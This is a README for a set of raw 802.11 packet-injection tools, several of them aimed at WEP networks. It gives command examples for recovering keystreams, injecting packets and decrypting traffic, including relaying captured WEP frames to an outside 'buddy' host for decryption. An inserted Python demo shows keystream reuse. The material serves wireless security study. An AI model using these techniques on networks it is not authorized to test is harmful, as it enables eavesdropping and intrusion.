This is a collection of tools that use raw 802.11 packet injection.
None of the tools configure the interface, so be sure to run something
like

    ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up

beforehand. The following tools are found here:
    assoc    Acts as a wifi client.
    ap       A wifi access point.
    prga     Gives ability to transmit on a WEP network.
    redir    Gives ability to decrypt in real-time on a WEP network, via Internet.
    expand   Gives ability to decrypt locally on a WEP network.

All these tools depend on:

    libw00t  Utility functions used by all tools.
Detailed explanation of tools.
==============================
assoc

Acts as a wifi client. It will associate to a network and bind a
tap interface to it. The interface may be used like a standard eth
interface attached to a normal LAN. Multiple instances of the
program may be run in order to connect to multiple APs simultaneously.
Example:

    ./assoc -s w00t -t tap0
    ifconfig tap0 192.168.0.123 up
ap

The same as assoc, but acts as an access point. Example:

    ifconfig tap1 192.168.0.1 up
[For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
for theoretical information.]
prga

Sniff a packet on a WEP network and obtain a keystream. It binds
to a tap interface which may be used to TX packets on that network.
Example:

    ./prga -b bssid_of_network -t tap0
    ifconfig tap0 192.168.0.123 up
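The property prga relies on, as an added illustration that is not part of the w00t tools: WEP XORs each frame with RC4(IV || key), and the 24-bit IV travels in clear, so a frame whose plaintext prefix is known (every data frame starts with the same LLC/SNAP header) reveals the keystream for that IV, which then decrypts any other frame sent under the same IV without the key. All keys, IVs and frames below are constructed.

```python
# Added illustration (not w00t code): keystream reuse in WEP.
# Simplified frame layout: IV (3 bytes, clear) || RC4(IV||key) XOR plaintext.
# The ICV and 802.11 header are omitted; all values are constructed.

def rc4(key: bytes, n: int) -> bytes:
    """Return the first n bytes of the RC4 keystream for key."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                        # pseudo-random generation
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xff])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key40: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Encrypt one frame body; the per-packet RC4 key is IV || WEP key."""
    return iv + xor(rc4(iv + key40, len(plaintext)), plaintext)

def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Keystream prefix revealed by a frame whose plaintext prefix is known."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body, known_plaintext)

def decrypt_with_keystream(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Decrypt a different frame that reuses the same IV, without the key."""
    if frame[:3] != iv:
        raise ValueError("IV differs; recovered keystream does not apply")
    return xor(frame[3:], keystream)

def demo() -> bytes:
    key = bytes.fromhex("0102030405")         # constructed 40-bit WEP key
    iv = b"\x11\x22\x33"                      # constructed IV, reused twice
    snap = bytes.fromhex("aaaa03000000")      # LLC/SNAP header: known plaintext
    f1 = wep_encrypt(key, iv, snap + b"hello")
    f2 = wep_encrypt(key, iv, snap + b"world")
    iv, ks = recover_keystream(f1, snap + b"hello")
    return decrypt_with_keystream(f2, iv, ks)  # plaintext of f2, key never used
```

The same reuse is why an IV space of only 2^24 values guarantees repeated keystreams on a busy network; WPA2/WPA3 replace per-packet RC4 keying entirely.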
redir

Resend WEP packets to our buddy on the Internet. The buddy will
receive the clear-text and send it back to us via a UDP socket.
This data is then fed back into a tap interface. This way, data
may ultimately be read from the tap iface in clear-text. Example:

    [Box on Internet]~# ./buddy
    ./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666
expand

Sniff a WEP packet and do the linear keystream expansion trick to
decrypt it. The clear-text packet is sent to a tap interface.
Example:

    ./expand -b bssid -t tap0